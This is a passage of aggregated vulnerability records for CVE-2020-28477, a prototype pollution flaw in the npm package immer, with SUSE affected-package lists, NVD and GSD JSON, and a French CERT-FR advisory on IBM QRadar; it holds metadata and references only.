"SUSE Manager Server Module 4.1:mgr-osa-dispatcher-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:prometheus-exporters-formula-0.9.0-3.19.2.noarch",
"SUSE Manager Server Module 4.1:prometheus-formula-0.3.1-3.6.2.noarch",
"SUSE Manager Server Module 4.1:py26-compat-salt-2016.11.10-6.11.2.noarch",
"SUSE Manager Server Module 4.1:python3-mgr-osa-common-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:python3-mgr-osa-dispatcher-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:python3-rhnlib-4.1.3-4.3.2.noarch",
"SUSE Manager Server Module 4.1:python3-spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.ppc64le",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.s390x",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.x86_64",
"SUSE Manager Server Module 4.1:spacewalk-backend-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-app-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-applet-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-common-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-tool-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-iss-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-iss-export-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-package-push-server-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-server-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-sql-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-sql-postgresql-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-tools-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-xml-export-libs-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-xmlrpc-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-minimal-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-minimal-config-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Server Module 4.1:spacewalk-config-4.1.5-3.3.2.noarch",
"SUSE Manager Server Module 4.1:spacewalk-html-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-config-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-lib-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-postgresql-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-taskomatic-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-utils-4.1.14-3.12.2.noarch",
"SUSE Manager Server Module 4.1:spacewalk-utils-extras-4.1.14-3.12.2.noarch",
"SUSE Manager Server Module 4.1:subscription-matcher-0.26-3.6.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.ppc64le",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.s390x",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.x86_64",
"SUSE Manager Server Module 4.1:susemanager-doc-indexes-4.1-11.28.4.noarch",
"SUSE Manager Server Module 4.1:susemanager-docs_en-4.1-11.28.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-docs_en-pdf-4.1-11.28.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-schema-4.1.19-3.24.4.noarch",
"SUSE Manager Server Module 4.1:susemanager-sls-4.1.21-3.26.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.ppc64le",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.s390x",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.x86_64",
"SUSE Manager Server Module 4.1:susemanager-web-libs-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:uyuni-config-modules-4.1.21-3.26.2.noarch",
"SUSE Manager Server Module 4.1:xpp3-1.1.4c-11.2.2.noarch",
"SUSE Manager Server Module 4.1:xpp3-minimal-1.1.4c-11.2.2.noarch",
"SUSE Manager Server Module 4.1:xstream-1.4.15-3.5.2.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Manager Proxy Module 4.1:mgr-osad-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-mgr-osa-common-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-mgr-osad-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-rhnlib-4.1.3-4.3.2.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-check-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-client-setup-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-backend-4.1.21-4.22.7.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-base-minimal-4.1.23-3.18.6.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-base-minimal-config-4.1.23-3.18.6.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-check-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-client-setup-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-broker-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-common-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-installer-4.1.6-3.3.2.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-management-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-package-manager-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-redirect-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-salt-4.1.4-3.9.4.noarch",
"SUSE Manager Server Module 4.1:cobbler-3.0.0+git20190806.32c4bae0-5.6.4.noarch",
"SUSE Manager Server Module 4.1:grafana-formula-0.4.0-3.6.2.noarch",
"SUSE Manager Server Module 4.1:mgr-libmod-4.1.7-3.16.2.noarch",
"SUSE Manager Server Module 4.1:mgr-osa-dispatcher-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:prometheus-exporters-formula-0.9.0-3.19.2.noarch",
"SUSE Manager Server Module 4.1:prometheus-formula-0.3.1-3.6.2.noarch",
"SUSE Manager Server Module 4.1:py26-compat-salt-2016.11.10-6.11.2.noarch",
"SUSE Manager Server Module 4.1:python3-mgr-osa-common-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:python3-mgr-osa-dispatcher-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:python3-rhnlib-4.1.3-4.3.2.noarch",
"SUSE Manager Server Module 4.1:python3-spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.ppc64le",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.s390x",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.x86_64",
"SUSE Manager Server Module 4.1:spacewalk-backend-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-app-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-applet-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-common-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-tool-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-iss-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-iss-export-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-package-push-server-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-server-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-sql-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-sql-postgresql-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-tools-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-xml-export-libs-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-xmlrpc-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-minimal-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-minimal-config-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Server Module 4.1:spacewalk-config-4.1.5-3.3.2.noarch",
"SUSE Manager Server Module 4.1:spacewalk-html-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-config-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-lib-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-postgresql-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-taskomatic-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-utils-4.1.14-3.12.2.noarch",
"SUSE Manager Server Module 4.1:spacewalk-utils-extras-4.1.14-3.12.2.noarch",
"SUSE Manager Server Module 4.1:subscription-matcher-0.26-3.6.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.ppc64le",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.s390x",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.x86_64",
"SUSE Manager Server Module 4.1:susemanager-doc-indexes-4.1-11.28.4.noarch",
"SUSE Manager Server Module 4.1:susemanager-docs_en-4.1-11.28.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-docs_en-pdf-4.1-11.28.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-schema-4.1.19-3.24.4.noarch",
"SUSE Manager Server Module 4.1:susemanager-sls-4.1.21-3.26.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.ppc64le",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.s390x",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.x86_64",
"SUSE Manager Server Module 4.1:susemanager-web-libs-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:uyuni-config-modules-4.1.21-3.26.2.noarch",
"SUSE Manager Server Module 4.1:xpp3-1.1.4c-11.2.2.noarch",
"SUSE Manager Server Module 4.1:xpp3-minimal-1.1.4c-11.2.2.noarch",
"SUSE Manager Server Module 4.1:xstream-1.4.15-3.5.2.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2021-03-19T15:18:39Z",
"details": "important"
}
],
"title": "CVE-2020-28477"
}
]
}
fkie_cve-2020-28477
Vulnerability from fkie_nvd
| URL | Tags | ||
|---|---|---|---|
| report@snyk.io | https://github.com/immerjs/immer/blob/master/src/plugins/patches.ts%23L213 | Broken Link | |
| report@snyk.io | https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1061986 | Exploit, Third Party Advisory | |
| report@snyk.io | https://snyk.io/vuln/SNYK-JS-IMMER-1019369 | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/immerjs/immer/blob/master/src/plugins/patches.ts%23L213 | Broken Link | |
| af854a3a-2127-422b-91ae-364da2661108 | https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1061986 | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://snyk.io/vuln/SNYK-JS-IMMER-1019369 | Exploit, Third Party Advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| immer_project | immer | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:immer_project:immer:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "34A4B894-BEB8-47C4-AD4E-9D5C8DD8BD27",
"versionEndExcluding": "8.0.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "This affects all versions of package immer."
},
{
"lang": "es",
"value": "Esto afecta a todas las versiones del paquete immer"
}
],
"id": "CVE-2020-28477",
"lastModified": "2024-11-21T05:22:52.393",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "report@snyk.io",
"type": "Secondary"
}
]
},
"published": "2021-01-19T11:15:13.167",
"references": [
{
"source": "report@snyk.io",
"tags": [
"Broken Link"
],
"url": "https://github.com/immerjs/immer/blob/master/src/plugins/patches.ts%23L213"
},
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1061986"
},
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://snyk.io/vuln/SNYK-JS-IMMER-1019369"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link"
],
"url": "https://github.com/immerjs/immer/blob/master/src/plugins/patches.ts%23L213"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1061986"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://snyk.io/vuln/SNYK-JS-IMMER-1019369"
}
],
"sourceIdentifier": "report@snyk.io",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
CERTFR-2024-AVI-0630
Vulnerability from certfr_avis
De multiples vulnérabilités ont été découvertes dans IBM QRadar. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, une élévation de privilèges et un déni de service à distance.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
| Title | Publication Time | Tags | |||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "QRadar Pulse App versions ant\u00e9rieures \u00e0 2.2.14",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Data Synchronization App versions ant\u00e9rieures \u00e0 3.2.0",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Network Packet Capture versions 7.5.0 ant\u00e9rieures \u00e0 7.5.0 Update Package 8",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2023-40217",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-40217"
},
{
"name": "CVE-2018-3721",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-3721"
},
{
"name": "CVE-2024-29041",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29041"
},
{
"name": "CVE-2024-28834",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28834"
},
{
"name": "CVE-2021-23364",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-23364"
},
{
"name": "CVE-2023-51385",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-51385"
},
{
"name": "CVE-2024-4068",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4068"
},
{
"name": "CVE-2023-38546",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38546"
},
{
"name": "CVE-2024-33602",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-33602"
},
{
"name": "CVE-2023-3817",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3817"
},
{
"name": "CVE-2021-23436",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-23436"
},
{
"name": "CVE-2022-37603",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-37603"
},
{
"name": "CVE-2023-36632",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-36632"
},
{
"name": "CVE-2022-25883",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-25883"
},
{
"name": "CVE-2024-29415",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29415"
},
{
"name": "CVE-2023-45133",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45133"
},
{
"name": "CVE-2024-33600",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-33600"
},
{
"name": "CVE-2023-4813",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4813"
},
{
"name": "CVE-2024-33599",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-33599"
},
{
"name": "CVE-2016-10540",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-10540"
},
{
"name": "CVE-2020-28477",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-28477"
},
{
"name": "CVE-2023-5981",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5981"
},
{
"name": "CVE-2024-4067",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4067"
},
{
"name": "CVE-2022-43441",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43441"
},
{
"name": "CVE-2021-43138",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43138"
},
{
"name": "CVE-2023-48795",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-48795"
},
{
"name": "CVE-2023-0842",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0842"
},
{
"name": "CVE-2024-27983",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27983"
},
{
"name": "CVE-2022-37601",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-37601"
},
{
"name": "CVE-2024-27982",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27982"
},
{
"name": "CVE-2023-3341",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3341"
},
{
"name": "CVE-2023-5156",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5156"
},
{
"name": "CVE-2024-0553",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0553"
},
{
"name": "CVE-2023-3609",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3609"
},
{
"name": "CVE-2022-3517",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3517"
},
{
"name": "CVE-2024-33601",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-33601"
},
{
"name": "CVE-2024-27088",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27088"
},
{
"name": "CVE-2023-6129",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6129"
},
{
"name": "CVE-2022-25881",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-25881"
},
{
"name": "CVE-2021-24033",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-24033"
},
{
"name": "CVE-2024-28863",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28863"
},
{
"name": "CVE-2024-31905",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-31905"
},
{
"name": "CVE-2023-4806",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4806"
},
{
"name": "CVE-2018-16487",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-16487"
},
{
"name": "CVE-2021-42740",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-42740"
},
{
"name": "CVE-2016-10538",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-10538"
},
{
"name": "CVE-2023-35001",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-35001"
},
{
"name": "CVE-2024-28835",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28835"
},
{
"name": "CVE-2023-32233",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32233"
},
{
"name": "CVE-2023-42282",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-42282"
},
{
"name": "CVE-2023-39615",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39615"
},
{
"name": "CVE-2023-3446",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3446"
},
{
"name": "CVE-2023-0361",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0361"
},
{
"name": "CVE-2023-5678",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5678"
},
{
"name": "CVE-2024-2961",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-2961"
},
{
"name": "CVE-2024-0567",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0567"
},
{
"name": "CVE-2021-3757",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3757"
}
],
"initial_release_date": "2024-07-26T00:00:00",
"last_revision_date": "2024-07-26T00:00:00",
"links": [],
"reference": "CERTFR-2024-AVI-0630",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2024-07-26T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans IBM QRadar. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, une \u00e9l\u00e9vation de privil\u00e8ges et un d\u00e9ni de service \u00e0 distance.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans IBM QRadar",
"vendor_advisories": [
{
"published_at": "2024-07-24",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7161462",
"url": "https://www.ibm.com/support/pages/node/7161462"
},
{
"published_at": "2024-07-23",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7160961",
"url": "https://www.ibm.com/support/pages/node/7160961"
},
{
"published_at": "2024-07-22",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7160858",
"url": "https://www.ibm.com/support/pages/node/7160858"
}
]
}
gsd-2020-28477
Vulnerability from gsd
{
"GSD": {
"alias": "CVE-2020-28477",
"description": "This affects all versions of package immer.",
"id": "GSD-2020-28477",
"references": [
"https://www.suse.com/security/cve/CVE-2020-28477.html",
"https://access.redhat.com/errata/RHSA-2021:1169"
]
},
"gsd": {
"metadata": {
"exploitCode": "unknown",
"remediation": "unknown",
"reportConfidence": "confirmed",
"type": "vulnerability"
},
"osvSchema": {
"aliases": [
"CVE-2020-28477"
],
"details": "This affects all versions of package immer.",
"id": "GSD-2020-28477",
"modified": "2023-12-13T01:22:01.483619Z",
"schema_version": "1.4.0"
}
},
"namespaces": {
"cve.org": {
"CVE_data_meta": {
"ASSIGNER": "report@snyk.io",
"DATE_PUBLIC": "2021-01-19T10:16:28.654636Z",
"ID": "CVE-2020-28477",
"STATE": "PUBLIC",
"TITLE": "Prototype Pollution"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "immer",
"version": {
"version_data": [
{
"version_affected": "\u003e=",
"version_value": "0"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Alessio Della Libera (d3lla)"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "This affects all versions of package immer."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:U/RC:C",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Prototype Pollution"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://snyk.io/vuln/SNYK-JS-IMMER-1019369",
"refsource": "MISC",
"url": "https://snyk.io/vuln/SNYK-JS-IMMER-1019369"
},
{
"name": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1061986",
"refsource": "MISC",
"url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1061986"
},
{
"name": "https://github.com/immerjs/immer/blob/master/src/plugins/patches.ts%23L213",
"refsource": "MISC",
"url": "https://github.com/immerjs/immer/blob/master/src/plugins/patches.ts%23L213"
}
]
}
},
"gitlab.com": {
"advisories": [
{
"affected_range": "\u003c8.0.1",
"affected_versions": "All versions before 8.0.1",
"cvss_v2": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"cvss_v3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"cwe_ids": [
"CWE-1035",
"CWE-937"
],
"date": "2021-02-04",
"description": "immer suffers from a prototype pollution vulnerability in the `applyPatches_` function of `patches.ts`.",
"fixed_versions": [
"8.0.1"
],
"identifier": "CVE-2020-28477",
"identifiers": [
"CVE-2020-28477"
],
"not_impacted": "All versions starting from 8.0.1",
"package_slug": "npm/immer",
"pubdate": "2021-01-19",
"solution": "Upgrade to version 8.0.1 or above.",
"title": "Prototype Pollution",
"urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2020-28477"
],
"uuid": "252d09b6-58ce-4771-8642-5d786f0c05e4"
}
]
},
"nvd.nist.gov": {
"configurations": {
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:immer_project:immer:*:*:*:*:*:node.js:*:*",
"cpe_name": [],
"versionEndExcluding": "8.0.1",
"vulnerable": true
}
],
"operator": "OR"
}
]
},
"cve": {
"CVE_data_meta": {
"ASSIGNER": "report@snyk.io",
"ID": "CVE-2020-28477"
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "en",
"value": "This affects all versions of package immer."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1061986",
"refsource": "MISC",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1061986"
},
{
"name": "https://github.com/immerjs/immer/blob/master/src/plugins/patches.ts%23L213",
"refsource": "MISC",
"tags": [
"Broken Link"
],
